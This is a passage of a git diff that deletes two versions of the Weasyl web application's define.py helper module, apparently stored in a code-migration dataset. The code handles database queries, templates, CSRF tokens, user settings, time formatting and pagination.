settings page, where -# the max sfw/nsfw rating need to be displayed separately -def get_config_rating(userid): - """ - Retrieve the sfw-mode and regular-mode ratings separately - :param userid: the user to retrieve ratings for - :return: a tuple of (max_rating, max_sfw_rating) - """ - config = get_config(userid) - - if 'p' in config: - max_rating = ratings.EXPLICIT.code - elif 'a' in config: - max_rating = ratings.MATURE.code - else: - max_rating = ratings.GENERAL.code - - profile_settings = get_profile_settings(userid) - sfw_rating = profile_settings.max_sfw_rating - return max_rating, sfw_rating - - -def is_sfw_mode(): - """ - determine whether the current session is in SFW mode - :return: TRUE if sfw or FALSE if nsfw - """ - return get_current_request().cookies.get('sfwmode', "nsfw") == "sfw" - - -def get_premium(userid): - if not userid: - return False - - config = get_config(userid) - return "d" in config - - -@region.cache_on_arguments() -@record_timing -def _get_display_name(userid): - """ - Return the display name assiciated with `userid`; if no such user exists, - return None. 
- """ - return engine.scalar("SELECT username FROM profile WHERE userid = %(user)s", user=userid) - - -def get_display_name(userid): - if not userid: - return None - return _get_display_name(userid) - - -def get_int(target): - if target is None: - return 0 - - if isinstance(target, numbers.Number): - return int(target) - - try: - return int("".join(i for i in target if i.isdigit())) - except ValueError: - return 0 - - -def get_targetid(*argv): - for i in argv: - if i: - return i - - -def get_search_tag(target): - target = "".join(i for i in target if ord(i) < 128) - target = target.replace(" ", "_") - target = "".join(i for i in target if i.isalnum() or i in "_") - target = target.strip("_") - target = "_".join(i for i in target.split("_") if i) - - return target.lower() - - -def get_time(): - """ - Returns the current unixtime. - """ - return int(time.time()) + _UNIXTIME_OFFSET - - -def get_timestamp(): - """ - Returns the current date in the format YYYY-MM. - """ - return time.strftime("%Y-%m", time.localtime(get_time())) - - -def _get_hash_path(charid): - id_hash = hashlib.sha1(b"%i" % (charid,)).hexdigest() - return "/".join([id_hash[i:i + 2] for i in range(0, 11, 2)]) + "/" - - -def get_character_directory(charid): - return macro.MACRO_SYS_CHAR_PATH + _get_hash_path(charid) - - -@region.cache_multi_on_arguments(should_cache_fn=bool) -def _get_userids(*sysnames): - result = engine.execute( - "SELECT login_name, userid FROM login WHERE login_name = ANY (%(names)s)" - " UNION ALL SELECT alias_name, userid FROM useralias WHERE alias_name = ANY (%(names)s)" - " UNION ALL SELECT login_name, userid FROM username_history WHERE active AND login_name = ANY (%(names)s)", - names=list(sysnames), - ) - - sysname_userid = dict(result.fetchall()) - - return [sysname_userid.get(sysname, 0) for sysname in sysnames] - - -def get_userids(usernames): - ret = {} - lookup_usernames = [] - sysnames = [] - - for username in usernames: - sysname = get_sysname(username) - - if sysname: - lookup_usernames.append(username) - sysnames.append(sysname) - else: - ret[username] = 0 - - ret.update(zip(lookup_usernames, _get_userids(*sysnames))) - - return ret - - -def get_userid_list(target): - usernames = target.split(";") - return [userid for userid in get_userids(usernames).values() if userid != 0] - - -def get_ownerid(submitid=None, charid=None, journalid=None): - if submitid: - return engine.scalar("SELECT userid FROM submission WHERE submitid = %(id)s", id=submitid) - if charid: - return engine.scalar("SELECT userid FROM character WHERE charid = %(id)s", id=charid) - if journalid: - return engine.scalar("SELECT userid FROM journal WHERE journalid = %(id)s", id=journalid) - - -def get_random_set(target, count): - """ - Returns the specified number of unique items chosen at random from the target - list. If more items are specified than the list contains, the full contents - of the list will be returned in a randomized order. 
- """ - return random.sample(target, min(count, len(target))) - - -def get_address(): - request = get_current_request() - return request.client_addr - - -def _get_path(): - return get_current_request().path_url - - -def text_price_amount(target): - return "%.2f" % (float(target) / 100.0) - - -def text_price_symbol(target): - from weasyl.commishinfo import CURRENCY_CHARMAP - for c in target: - if c in CURRENCY_CHARMAP: - return CURRENCY_CHARMAP[c].symbol - return CURRENCY_CHARMAP[''].symbol - - -def text_first_line(target, strip=False): - """ - Return the first line of text; if `strip` is True, return all but the first - line of text. - """ - first_line, _, rest = target.partition("\n") - - if strip: - return rest - else: - return first_line - - -def text_fix_url(target): - if target.startswith(("http://", "https://")): - return target - - return "http://" + target - - -def local_arrow(dt): - tz = get_current_request().weasyl_session.timezone - return arrow.Arrow.fromdatetime(tz.localtime(dt)) - - -def convert_to_localtime(target): - tz = get_current_request().weasyl_session.timezone - if isinstance(target, arrow.Arrow): - return tz.localtime(target.datetime) - elif isinstance(target, datetime.datetime): - return tz.localtime(target) - else: - target = int(get_time() if target is None else target) - _UNIXTIME_OFFSET - return tz.localtime_from_timestamp(target) - - -def convert_date(target=None): - """ - Returns the date in the format 1 January 1970. If no target is passed, the - current date is returned. - """ - dt = convert_to_localtime(target) - result = dt.strftime("%d %B %Y") - return result[1:] if result and result[0] == "0" else result - - -def iso8601_date(target): - """ - Converts a Weasyl timestamp to an ISO 8601 date (yyyy-mm-dd). - - NB: Target is offset by _UNIXTIME_OFFSET - - :param target: The target Weasyl timestamp to convert. - :return: An ISO 8601 string representing the date of `target`. - """ - date = datetime.datetime.utcfromtimestamp(target - _UNIXTIME_OFFSET) - return arrow.get(date).format("YYYY-MM-DD") - - -def _convert_time(target=None): - """ - Returns the time in the format 16:00:00. If no target is passed, the - current time is returned. - """ - dt = convert_to_localtime(target) - config = get_config(get_userid()) - if '2' in config: - return dt.strftime("%I:%M:%S %p %Z") - else: - return dt.strftime("%H:%M:%S %Z") - - -def convert_unixdate(day, month, year): - """ - Returns the unixtime corresponding to the beginning of the specified date; if - the date is not valid, None is returned. - """ - day, month, year = (get_int(i) for i in [day, month, year]) - - try: - ret = int(time.mktime(datetime.date(year, month, day).timetuple())) - except ValueError: - return None - # range of a postgres integer - if ret > 2147483647 or ret < -2147483648: - return None - return ret - - -def convert_age(target): - return (get_time() - target) // 31556926 - - -def age_in_years(birthdate): - """ - Determines an age in years based off of the given arrow.Arrow birthdate - and the current date. 
- """ - now = arrow.now() - is_upcoming = (now.month, now.day) < (birthdate.month, birthdate.day) - - return now.year - birthdate.year - int(is_upcoming) - - -def user_type(userid): - if userid in staff.DIRECTORS: - return "director" - if userid in staff.TECHNICAL: - return "tech" - if userid in staff.ADMINS: - return "admin" - if userid in staff.MODS: - return "mod" - if userid in staff.DEVELOPERS: - return "dev" - - return None - - -@region.cache_on_arguments(expiration_time=180) -@record_timing -def _page_header_info(userid): - messages = engine.scalar( - "SELECT COUNT(*) FROM message WHERE otherid = %(user)s AND settings ~ 'u'", user=userid) - result = [messages, 0, 0, 0, 0] - - counts = engine.execute( - """ - SELECT type / 1000 AS group, COUNT(*) AS count - FROM welcome - LEFT JOIN submission - ON welcome.targetid = submission.submitid - AND welcome.type BETWEEN 2000 AND 2999 - WHERE - welcome.userid = %(user)s - AND ( - submission.rating IS NULL - OR submission.rating <= %(rating)s - ) - GROUP BY "group" - """, user=userid, rating=get_rating(userid)) - - for group, count in counts: - result[5 - group] = count - - return result - - -def page_header_info(userid): - from weasyl import media - sfw = get_current_request().cookies.get('sfwmode', 'nsfw') - return { - "welcome": _page_header_info(userid), - "userid": userid, - "username": get_display_name(userid), - "user_media": media.get_user_media(userid), - "sfw": sfw, - } - - -def common_page_start(userid, options=None, **extended_options): - if options is None: - options = [] - - userdata = None - if userid: - userdata = page_header_info(userid) - - data = render( - "common/page_start.html", [userdata, options, extended_options]) - - return [data] - - -def common_page_end(userid, page, options=None): - data = render("common/page_end.html", (options,)) - page.append(data) - return "".join(page) - - -def common_status_check(userid): - """ - Returns the name of the script to which the user should be redirected - if required. - """ - if not userid: - return None - - is_banned, is_suspended = get_login_settings(userid) - - if is_banned: - return "banned" - if is_suspended: - return "suspended" - - return None - - -def common_status_page(userid, status): - """ - Raise the redirect to the script returned by common_status_check() or render - the appropriate site status error page. - """ - if status in ('banned', 'suspended'): - from weasyl import moderation, login - - login.signout(get_current_request()) - if status == 'banned': - reason = moderation.get_ban_reason(userid) - return errorpage( - userid, - "Your account has been permanently banned and you are no longer allowed " - "to sign in.\n\n%s\n\nIf you believe this ban is in error, please " - "contact %s for assistance." % (reason, MACRO_SUPPORT_ADDRESS)) - - elif status == 'suspended': - suspension = moderation.get_suspension(userid) - return errorpage( - userid, - "Your account has been temporarily suspended and you are not allowed to " - "be logged in at this time.\n\n%s\n\nThis suspension will be lifted on " - "%s.\n\nIf you believe this suspension is in error, please contact " - "%s for assistance." % (suspension.reason, convert_date(suspension.release), MACRO_SUPPORT_ADDRESS)) - - -_content_types = { - 'submit': 110, - 'char': 120, - 'journal': 130, - 'profile': 210, -} - - -def common_view_content(userid, targetid, feature): - """ - Return True if a record was successfully inserted into the views table - and the page view statistic incremented, else False. 
- """ - if feature == "profile" and targetid == userid: - return - - typeid = _content_types.get(feature, 0) - if userid: - viewer = 'user:%d' % (userid,) - else: - viewer = get_address() - - result = engine.execute( - 'INSERT INTO views (viewer, targetid, type) VALUES (%(viewer)s, %(targetid)s, %(type)s) ON CONFLICT DO NOTHING', - viewer=viewer, targetid=targetid, type=typeid) - - if result.rowcount == 0: - return False - - if feature == "submit": - engine.execute("UPDATE submission SET page_views = page_views + 1 WHERE submitid = %(id)s", id=targetid) - elif feature == "char": - engine.execute("UPDATE character SET page_views = page_views + 1 WHERE charid = %(id)s", id=targetid) - elif feature == "journal": - engine.execute("UPDATE journal SET page_views = page_views + 1 WHERE journalid = %(id)s", id=targetid) - elif feature == "profile": - engine.execute("UPDATE profile SET page_views = page_views + 1 WHERE userid = %(id)s", id=targetid) - - return True - - -def append_to_log(logname, **parameters): - parameters['when'] = datetime.datetime.now().isoformat() - log_path = '%s%s.%s.log' % (macro.MACRO_SYS_LOG_PATH, logname, get_timestamp()) - with open(log_path, 'a') as outfile: - outfile.write(json.dumps(parameters)) - outfile.write('\n') - - -_CHARACTER_SETTINGS_FEATURE_SYMBOLS = { - "char/thumb": "-", - "char/cover": "~", - "char/submit": "=", -} - -_CHARACTER_SETTINGS_TYPE_EXTENSIONS = { - "J": ".jpg", - "P": ".png", - "G": ".gif", - "T": ".txt", - "H": ".htm", - "M": ".mp3", - "F": ".swf", - "A": ".pdf", -} - - -def url_type(settings, feature): - """ - Return the file extension specified in `settings` for the passed feature. - """ - symbol = _CHARACTER_SETTINGS_FEATURE_SYMBOLS[feature] - type_code = settings[settings.index(symbol) + 1] - - return _CHARACTER_SETTINGS_TYPE_EXTENSIONS[type_code] - - -def url_make(targetid, feature, query=None, root=False, file_prefix=None): - """ - Return the URL to a resource; if `root` is True, the path will start from - the root. 
- """ - result = [] if root else ["/"] - - if root: - result.append(macro.MACRO_STORAGE_ROOT) - - if "char/" in feature: - result.extend([macro.MACRO_URL_CHAR_PATH, _get_hash_path(targetid)]) - - if file_prefix is not None: - result.append("%s-" % (file_prefix,)) - - # Character file - if feature == "char/submit": - if query is None: - query = engine.execute("SELECT userid, settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "=" in query[1]: - result.append("%i.submit.%i%s" % (targetid, query[0], url_type(query[1], feature))) - else: - return None - # Character cover - elif feature == "char/cover": - if query is None: - query = engine.execute("SELECT settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "~" in query[0]: - result.append("%i.cover%s" % (targetid, url_type(query[0], feature))) - else: - return None - # Character thumbnail - elif feature == "char/thumb": - if query is None: - query = engine.execute("SELECT settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "-" in query[0]: - result.append("%i.thumb%s" % (targetid, url_type(query[0], feature))) - else: - return None if root else get_resource_path("img/default-visual.png") - # Character thumbnail selection - elif feature == "char/.thumb": - result.append("%i.new.thumb" % (targetid,)) - - return "".join(result) - - -def cdnify_url(url): - cdn_root = config_read_setting("cdn_root") - if not cdn_root: - return url - - return urljoin(cdn_root, url) - - -def get_resource_path(resource): - if reload_assets: - _load_resources() - - return '/' + resource_paths[resource] - - -def get_resource_url(resource): - """ - Get a full URL for a resource. - - Useful for , for example. - """ - return 'https://www.weasyl.com' + get_resource_path(resource) - - -DEFAULT_SUBMISSION_THUMBNAIL = [ - dict.fromkeys( - ['display_url', 'file_url'], - get_resource_path('img/default-visual.png'), - ), -] - -DEFAULT_AVATAR = [ - dict.fromkeys( - ['display_url', 'file_url'], - get_resource_path('img/default-avatar.jpg'), - ), -] - - -def absolutify_url(url): - cdn_root = config_read_setting("cdn_root") - if cdn_root and url.startswith(cdn_root): - return url - - return urljoin(get_current_request().application_url, url) - - -def user_is_twitterbot(): - return get_current_request().environ.get('HTTP_USER_AGENT', '').startswith('Twitterbot') - - -def summarize(s, max_length=200): - if len(s) > max_length: - return s[:max_length - 1].rstrip() + u'\N{HORIZONTAL ELLIPSIS}' - return s - - -def clamp(val, lower_bound, upper_bound): - return min(max(val, lower_bound), upper_bound) - - -def timezones(): - ct = datetime.datetime.now(pytz.utc) - timezones_by_country = [ - (pytz.country_names[cc], [ - (int(ct.astimezone(pytz.timezone(tzname)).strftime("%z")), tzname) - for tzname in timezones - ]) - for cc, timezones in pytz.country_timezones.items()] - timezones_by_country.sort() - ret = [] - for country, timezones in timezones_by_country: - ret.append(('- %s -' % (country,), None)) - ret.extend( - ("[UTC%+05d] %s" % (offset, tzname.replace('_', ' ')), tzname) - for offset, tzname in timezones) - return ret - - -def query_string(query): - pairs = [] - - for key, value in query.items(): - if isinstance(value, (tuple, list, set)): - for subvalue in value: - pairs.append((key, subvalue)) - elif value: - pairs.append((key, value)) - - return urlencode(pairs) - - -def _requests_wrapper(func_name): - func = getattr(requests, func_name) - - def wrapper(*a, **kw): - request = 
get_current_request() - try: - return func(*a, **kw) - except Exception as e: - request.log_exc(level=logging.DEBUG) - w = WeasylError('httpError') - w.error_suffix = 'The original error was: %s' % (e,) - raise w - - return wrapper - - -http_get = _requests_wrapper('get') -http_post = _requests_wrapper('post') - - -def metric(*a, **kw): - pass - - -def iso8601(unixtime): - if isinstance(unixtime, arrow.Arrow) or isinstance(unixtime, datetime.datetime): - return unixtime.isoformat().partition('.')[0] + 'Z' - else: - return datetime.datetime.utcfromtimestamp(unixtime - _UNIXTIME_OFFSET).isoformat() + 'Z' - - -def parse_iso8601(s): - return arrow.Arrow.strptime(s, '%Y-%m-%dT%H:%M:%SZ').timestamp + _UNIXTIME_OFFSET - - -def paginate(results, backid, nextid, limit, key): - at_start = at_end = False - # if neither value is specified, we're definitely at the start - if not backid and not nextid: - at_start = True - - # if we were cut short... - if len(results) <= limit: - if backid: - # if moving backward we're at the start - at_start = True - else: - # if moving forward we're at the end - at_end = True - elif backid: - # delete extraneous rows from the front if we're moving backward - del results[:-limit] - else: - # or from the back if we're moving forward - del results[limit:] - - return ( - None if at_start or not results else results[0][key], - None if at_end or not results else results[-1][key]) - - -def thumb_for_sub(submission): - """ - Given a submission dict containing sub_media, sub_type and userid, - returns the appropriate media item to use as a thumbnail. - - Params: - submission: The submission. - - Returns: - The sub media to use as a thumb. - """ - user_id = get_userid() - profile_settings = get_profile_settings(user_id) - if (profile_settings.disable_custom_thumbs and - submission.get('subtype', 9999) < 2000 and - submission['userid'] != user_id): - thumb_key = 'thumbnail-generated' - else: - thumb_key = 'thumbnail-custom' if 'thumbnail-custom' in submission['sub_media'] else 'thumbnail-generated' - - return submission['sub_media'][thumb_key][0] - - -def webp_thumb_for_sub(submission): - """ - Given a submission dict containing sub_media, sub_type and userid, - returns the appropriate WebP media item to use as a thumbnail. - - Params: - submission: The submission. - - Returns: - The sub media to use as a thumb, or None. 
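
The `paginate` helper above implements cursor (keyset) pagination: the caller fetches one row beyond the page size, and the helper trims the surplus and returns `(backid, nextid)` cursors, with `None` marking either edge. Its logic is reproduced here with a tiny driver so the contract is visible:

def paginate(results, backid, nextid, limit, key):
    # Same logic as in define.py above.
    at_start = at_end = False
    if not backid and not nextid:
        at_start = True          # no cursor given: definitely the first page
    if len(results) <= limit:
        if backid:
            at_start = True      # cut short moving backward: reached the start
        else:
            at_end = True        # cut short moving forward: reached the end
    elif backid:
        del results[:-limit]     # moving backward: drop surplus from the front
    else:
        del results[limit:]      # moving forward: drop surplus from the back
    return (
        None if at_start or not results else results[0][key],
        None if at_end or not results else results[-1][key],
    )

rows = [{"id": i} for i in (100, 99, 98, 97)]  # 4 rows fetched for a 3-row page
print(paginate(rows, None, None, 3, "id"))     # (None, 98): first page, more below
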
- """ - user_id = get_userid() - profile_settings = get_profile_settings(user_id) - disable_custom_thumb = ( - profile_settings.disable_custom_thumbs and - submission.get('subtype', 9999) < 2000 and - submission['userid'] != user_id - ) - - if not disable_custom_thumb and 'thumbnail-custom' in submission['sub_media']: - return None - - thumbnail_generated_webp = submission['sub_media'].get('thumbnail-generated-webp') - return thumbnail_generated_webp and thumbnail_generated_webp[0] diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.target.py b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.target.py deleted file mode 100644 index de6c454..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$define.py.target.py +++ /dev/null @@ -1,1078 +0,0 @@ -import os -import time -import random -import hashlib -import hmac -import itertools -import json -import numbers -import datetime -import pkgutil -from urllib.parse import urlencode, urljoin - -import arrow -from pyramid.threadlocal import get_current_request -import pytz -import requests -import sqlalchemy as sa -import sqlalchemy.orm -from sentry_sdk import capture_exception -from sqlalchemy.exc import OperationalError -from web.template import Template - -import libweasyl.constants -from libweasyl.cache import region -from libweasyl.legacy import UNIXTIME_OFFSET as _UNIXTIME_OFFSET, get_sysname -from libweasyl.models.tables import metadata as meta -from libweasyl import html, text, ratings, security, staff - -from weasyl import config -from weasyl import errorcode -from weasyl import macro -from weasyl.config import config_obj, config_read_setting -from weasyl.error import WeasylError -from weasyl.macro import MACRO_SUPPORT_ADDRESS - - -_shush_pyflakes = [sqlalchemy.orm] - - -reload_templates = bool(os.environ.get('WEASYL_RELOAD_TEMPLATES')) -reload_assets = bool(os.environ.get('WEASYL_RELOAD_ASSETS')) - - -def _load_resources(): - global resource_paths - - with open(os.path.join(macro.MACRO_APP_ROOT, 'build/rev-manifest.json'), 'r') as f: - resource_paths = json.loads(f.read()) - - -_load_resources() - - -def record_timing(func): - return func - - -_sqlalchemy_url = config_obj.get('sqlalchemy', 'url') -if config._in_test: - _sqlalchemy_url += '_test' -engine = meta.bind = sa.create_engine(_sqlalchemy_url, max_overflow=25, pool_size=10) -sessionmaker = sa.orm.scoped_session(sa.orm.sessionmaker(bind=engine, autocommit=True)) - - -def connect(): - """ - Returns the current request's db connection or one from the engine. - """ - request = get_current_request() - if request is not None: - return request.pg_connection - # If there's no threadlocal request, we're probably operating in a cron task or the like. - # Return a connection from the pool. n.b. this means that multiple calls could get different - # connections. - # TODO(hyena): Does this clean up correctly? There's no registered 'close()' call. - return sessionmaker() - - -def execute(statement, argv=None): - """ - Executes an SQL statement; if `statement` represents a SELECT or RETURNING - statement, the query results will be returned. 
- """ - db = connect() - - if argv: - argv = tuple(argv) - - for x in argv: - if type(x) is not int: - raise TypeError("can't use %r as define.execute() parameter" % (x,)) - - statement %= argv - - query = db.connection().execute(statement) - - if statement.lstrip()[:6] == "SELECT" or " RETURNING " in statement: - return query.fetchall() - else: - query.close() - - -def column(results): - """ - Get a list of values from a single-column ResultProxy. - """ - return [x for x, in results] - - -_PG_SERIALIZATION_FAILURE = u'40001' - - -def serializable_retry(action, limit=16): - """ - Runs an action accepting a `Connection` parameter in a serializable - transaction, retrying it up to `limit` times. - """ - with engine.connect() as db: - db = db.execution_options(isolation_level='SERIALIZABLE') - - for i in itertools.count(1): - try: - with db.begin(): - return action(db) - except OperationalError as e: - if i == limit or e.orig.pgcode != _PG_SERIALIZATION_FAILURE: - raise - - -with open(os.path.join(macro.MACRO_APP_ROOT, "version.txt")) as f: - CURRENT_SHA = f.read().strip() - - -# Caching all templates. Parsing templates is slow; we don't need to do it all -# the time and there's plenty of memory for storing the compiled templates. -_template_cache = {} - - -def _compile(template_name): - """ - Compiles a template file and returns the result. - """ - template = _template_cache.get(template_name) - - if template is None or reload_templates: - _template_cache[template_name] = template = Template( - pkgutil.get_data(__name__, 'templates/' + template_name).decode('utf-8'), - filename=template_name, - globals={ - "STR": str, - "LOGIN": get_sysname, - "TOKEN": get_token, - "CSRF": _get_csrf_input, - "USER_TYPE": user_type, - "DATE": convert_date, - "ISO8601_DATE": iso8601_date, - "TIME": _convert_time, - "LOCAL_ARROW": local_arrow, - "PRICE": text_price_amount, - "SYMBOL": text_price_symbol, - "TITLE": titlebar, - "RENDER": render, - "COMPILE": _compile, - "MARKDOWN": text.markdown, - "MARKDOWN_EXCERPT": text.markdown_excerpt, - "SUMMARIZE": summarize, - "SHA": CURRENT_SHA, - "NOW": get_time, - "THUMB": thumb_for_sub, - "WEBP_THUMB": webp_thumb_for_sub, - "M": macro, - "R": ratings, - "SLUG": text.slug_for, - "QUERY_STRING": query_string, - "INLINE_JSON": html.inline_json, - "PATH": _get_path, - "arrow": arrow, - "constants": libweasyl.constants, - "getattr": getattr, - "json": json, - "sorted": sorted, - "staff": staff, - "resource_path": get_resource_path, - }) - - return template - - -def render(template_name, argv=()): - """ - Renders a template and returns the resulting HTML. 
- """ - template = _compile(template_name) - return str(template(*argv)) - - -def titlebar(title, backtext=None, backlink=None): - return render("common/stage_title.html", [title, backtext, backlink]) - - -def errorpage_html(userid, message_html, links=None, request_id=None, **extras): - return webpage(userid, "error/error.html", [message_html, links, request_id], **extras) - - -def errorpage(userid, code=None, links=None, request_id=None, **extras): - if code is None: - code = errorcode.unexpected - - return errorpage_html(userid, text.markdown(code), links, request_id, **extras) - - -def webpage(userid, template, argv=None, options=None, **extras): - if argv is None: - argv = [] - - if options is None: - options = [] - - page = common_page_start(userid, options=options, **extras) - page.append(render(template, argv)) - - return common_page_end(userid, page, options=options) - - -def get_weasyl_session(): - """ - Gets the weasyl_session for the current request. Most code shouldn't have to use this. - """ - # TODO: This method is inelegant. Remove this logic after updating login.signin(). - return get_current_request().weasyl_session - - -def get_userid(): - """ - Returns the userid corresponding to the current request, if any. - """ - return get_current_request().userid - - -def is_csrf_valid(request, token): - expected = request.weasyl_session.csrf_token - return expected is not None and hmac.compare_digest(str(token), str(expected)) - - -def get_token(): - from weasyl import api - - request = get_current_request() - - if api.is_api_user(request): - return '' - - # allow error pages with $:{TOKEN()} in the template to be rendered even - # when the error occurred before the session middleware set a session - if not hasattr(request, 'weasyl_session'): - return security.generate_key(20) - - sess = request.weasyl_session - if sess.csrf_token is None: - sess.csrf_token = security.generate_key(64) - sess.save = True - return sess.csrf_token - - -def _get_csrf_input(): - return '' % (get_token(),) - - -@region.cache_on_arguments(namespace='v3') -def _get_all_config(userid): - """ - Queries for, and returns, common user configuration settings. - - :param userid: The userid to query. - :return: A dict(), containing the following keys/values: - is_banned: Boolean. Is the user currently banned? - is_suspended: Boolean. Is the user currently suspended? - is_vouched_for: Boolean. Is the user vouched for? - profile_configuration: CharSettings/string. Configuration options in the profile. - jsonb_settings: JSON/dict. Profile settings set via jsonb_settings. 
- """ - row = engine.execute(""" - SELECT EXISTS (SELECT FROM permaban WHERE permaban.userid = %(userid)s) AS is_banned, - EXISTS (SELECT FROM suspension WHERE suspension.userid = %(userid)s) AS is_suspended, - lo.voucher IS NOT NULL AS is_vouched_for, - pr.config AS profile_configuration, - pr.jsonb_settings - FROM login lo INNER JOIN profile pr USING (userid) - WHERE userid = %(userid)s - """, userid=userid).first() - - return dict(row) - - -def get_config(userid): - """ Gets user configuration from the profile table (profile.config)""" - if not userid: - return "" - return _get_all_config(userid)['profile_configuration'] - - -def get_login_settings(userid): - """ Returns a Boolean pair in the form of (is_banned, is_suspended)""" - r = _get_all_config(userid) - return r['is_banned'], r['is_suspended'] - - -def is_vouched_for(userid): - return _get_all_config(userid)['is_vouched_for'] - - -def get_profile_settings(userid): - from weasyl.profile import ProfileSettings - - if not userid: - jsonb = {} - else: - jsonb = _get_all_config(userid)['jsonb_settings'] - - if jsonb is None: - jsonb = {} - - return ProfileSettings(jsonb) - - -def get_rating(userid): - if not userid: - return ratings.GENERAL.code - - if is_sfw_mode(): - profile_settings = get_profile_settings(userid) - - # if no explicit max SFW rating picked assume general as a safe default - return profile_settings.max_sfw_rating - - config = get_config(userid) - if 'p' in config: - return ratings.EXPLICIT.code - elif 'a' in config: - return ratings.MATURE.code - else: - return ratings.GENERAL.code - - -# this method is used specifically for the settings page, where -# the max sfw/nsfw rating need to be displayed separately -def get_config_rating(userid): - """ - Retrieve the sfw-mode and regular-mode ratings separately - :param userid: the user to retrieve ratings for - :return: a tuple of (max_rating, max_sfw_rating) - """ - config = get_config(userid) - - if 'p' in config: - max_rating = ratings.EXPLICIT.code - elif 'a' in config: - max_rating = ratings.MATURE.code - else: - max_rating = ratings.GENERAL.code - - profile_settings = get_profile_settings(userid) - sfw_rating = profile_settings.max_sfw_rating - return max_rating, sfw_rating - - -def is_sfw_mode(): - """ - determine whether the current session is in SFW mode - :return: TRUE if sfw or FALSE if nsfw - """ - return get_current_request().cookies.get('sfwmode', "nsfw") == "sfw" - - -def get_premium(userid): - if not userid: - return False - - config = get_config(userid) - return "d" in config - - -@region.cache_on_arguments() -@record_timing -def _get_display_name(userid): - """ - Return the display name assiciated with `userid`; if no such user exists, - return None. 
- """ - return engine.scalar("SELECT username FROM profile WHERE userid = %(user)s", user=userid) - - -def get_display_name(userid): - if not userid: - return None - return _get_display_name(userid) - - -def get_int(target): - if target is None: - return 0 - - if isinstance(target, numbers.Number): - return int(target) - - try: - return int("".join(i for i in target if i.isdigit())) - except ValueError: - return 0 - - -def get_targetid(*argv): - for i in argv: - if i: - return i - - -def get_search_tag(target): - target = "".join(i for i in target if ord(i) < 128) - target = target.replace(" ", "_") - target = "".join(i for i in target if i.isalnum() or i in "_") - target = target.strip("_") - target = "_".join(i for i in target.split("_") if i) - - return target.lower() - - -def get_time(): - """ - Returns the current unixtime. - """ - return int(time.time()) + _UNIXTIME_OFFSET - - -def get_timestamp(): - """ - Returns the current date in the format YYYY-MM. - """ - return time.strftime("%Y-%m", time.localtime(get_time())) - - -def _get_hash_path(charid): - id_hash = hashlib.sha1(b"%i" % (charid,)).hexdigest() - return "/".join([id_hash[i:i + 2] for i in range(0, 11, 2)]) + "/" - - -def get_character_directory(charid): - return macro.MACRO_SYS_CHAR_PATH + _get_hash_path(charid) - - -@region.cache_multi_on_arguments(should_cache_fn=bool) -def _get_userids(*sysnames): - result = engine.execute( - "SELECT login_name, userid FROM login WHERE login_name = ANY (%(names)s)" - " UNION ALL SELECT alias_name, userid FROM useralias WHERE alias_name = ANY (%(names)s)" - " UNION ALL SELECT login_name, userid FROM username_history WHERE active AND login_name = ANY (%(names)s)", - names=list(sysnames), - ) - - sysname_userid = dict(result.fetchall()) - - return [sysname_userid.get(sysname, 0) for sysname in sysnames] - - -def get_userids(usernames): - ret = {} - lookup_usernames = [] - sysnames = [] - - for username in usernames: - sysname = get_sysname(username) - - if sysname: - lookup_usernames.append(username) - sysnames.append(sysname) - else: - ret[username] = 0 - - ret.update(zip(lookup_usernames, _get_userids(*sysnames))) - - return ret - - -def get_userid_list(target): - usernames = target.split(";") - return [userid for userid in get_userids(usernames).values() if userid != 0] - - -def get_ownerid(submitid=None, charid=None, journalid=None): - if submitid: - return engine.scalar("SELECT userid FROM submission WHERE submitid = %(id)s", id=submitid) - if charid: - return engine.scalar("SELECT userid FROM character WHERE charid = %(id)s", id=charid) - if journalid: - return engine.scalar("SELECT userid FROM journal WHERE journalid = %(id)s", id=journalid) - - -def get_random_set(target, count): - """ - Returns the specified number of unique items chosen at random from the target - list. If more items are specified than the list contains, the full contents - of the list will be returned in a randomized order. 
- """ - return random.sample(target, min(count, len(target))) - - -def get_address(): - request = get_current_request() - return request.client_addr - - -def _get_path(): - return get_current_request().path_url - - -def text_price_amount(target): - return "%.2f" % (float(target) / 100.0) - - -def text_price_symbol(target): - from weasyl.commishinfo import CURRENCY_CHARMAP - for c in target: - if c in CURRENCY_CHARMAP: - return CURRENCY_CHARMAP[c].symbol - return CURRENCY_CHARMAP[''].symbol - - -def text_first_line(target, strip=False): - """ - Return the first line of text; if `strip` is True, return all but the first - line of text. - """ - first_line, _, rest = target.partition("\n") - - if strip: - return rest - else: - return first_line - - -def text_fix_url(target): - if target.startswith(("http://", "https://")): - return target - - return "http://" + target - - -def local_arrow(dt): - tz = get_current_request().weasyl_session.timezone - return arrow.Arrow.fromdatetime(tz.localtime(dt)) - - -def convert_to_localtime(target): - tz = get_current_request().weasyl_session.timezone - if isinstance(target, arrow.Arrow): - return tz.localtime(target.datetime) - elif isinstance(target, datetime.datetime): - return tz.localtime(target) - else: - target = int(get_time() if target is None else target) - _UNIXTIME_OFFSET - return tz.localtime_from_timestamp(target) - - -def convert_date(target=None): - """ - Returns the date in the format 1 January 1970. If no target is passed, the - current date is returned. - """ - dt = convert_to_localtime(target) - result = dt.strftime("%d %B %Y") - return result[1:] if result and result[0] == "0" else result - - -def iso8601_date(target): - """ - Converts a Weasyl timestamp to an ISO 8601 date (yyyy-mm-dd). - - NB: Target is offset by _UNIXTIME_OFFSET - - :param target: The target Weasyl timestamp to convert. - :return: An ISO 8601 string representing the date of `target`. - """ - date = datetime.datetime.utcfromtimestamp(target - _UNIXTIME_OFFSET) - return arrow.get(date).format("YYYY-MM-DD") - - -def _convert_time(target=None): - """ - Returns the time in the format 16:00:00. If no target is passed, the - current time is returned. - """ - dt = convert_to_localtime(target) - config = get_config(get_userid()) - if '2' in config: - return dt.strftime("%I:%M:%S %p %Z") - else: - return dt.strftime("%H:%M:%S %Z") - - -def convert_unixdate(day, month, year): - """ - Returns the unixtime corresponding to the beginning of the specified date; if - the date is not valid, None is returned. - """ - day, month, year = (get_int(i) for i in [day, month, year]) - - try: - ret = int(time.mktime(datetime.date(year, month, day).timetuple())) - except ValueError: - return None - # range of a postgres integer - if ret > 2147483647 or ret < -2147483648: - return None - return ret - - -def convert_age(target): - return (get_time() - target) // 31556926 - - -def age_in_years(birthdate): - """ - Determines an age in years based off of the given arrow.Arrow 